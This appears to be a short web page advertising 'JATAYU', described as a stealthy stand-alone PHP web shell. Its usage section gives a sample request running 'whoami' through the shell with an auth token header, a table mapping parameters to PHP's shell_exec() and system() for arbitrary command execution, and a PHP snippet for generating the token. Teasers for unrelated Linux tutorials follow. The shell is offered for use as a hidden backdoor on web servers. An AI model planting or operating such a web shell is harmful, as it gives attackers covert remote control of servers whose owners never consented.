JATAYU a Stealthy Stand Alone PHP Web Shell .
GET /test/jatayu.php?fn=1&&cmd=whoami
Host : http://test.com
Authtoken : bb3b1a1f-0447-42a6-955a-88681fb88499
FUNCTIONS
| PARAMETER | FUNCTION |
|---|---|
| fn=1 | Calls function shell_exec() |
| fn=2 | Calls function system() |
| cmd=id | Executes command |
GENERATE AUTHTOKEN
php
$r = unpack(‘v*’, fread(fopen(‘/dev/random’, ‘r’),16));
$apiKey = sprintf(‘%04x%04x-%04x-%04x-%04x-%04x%04x%04x’,
$r[1], $r[2], $r[3], $r[4] & 0x0fff | 0x4000,
$r[5] & 0x3fff | 0x8000, $r[6], $r[7], $r[8]);
echo $apiKey;
?>
Setting a static IP address on your server is a smart move. It ensures your…
Xrdp is an open-source implementation of the Microsoft Remote Desktop Protocol (RDP). It lets you access…
Managing user accounts is one of the most basic system administration tasks on any Linux…
Wine (short for "Wine Is Not an Emulator") is a compatibility layer that lets you run…
KVM (Kernel-based Virtual Machine) is an open-source virtualization technology built into the Linux kernel. It lets…
Ubuntu 20.04 LTS (code name Focal Fossa) was released on April 23, 2020. It is a…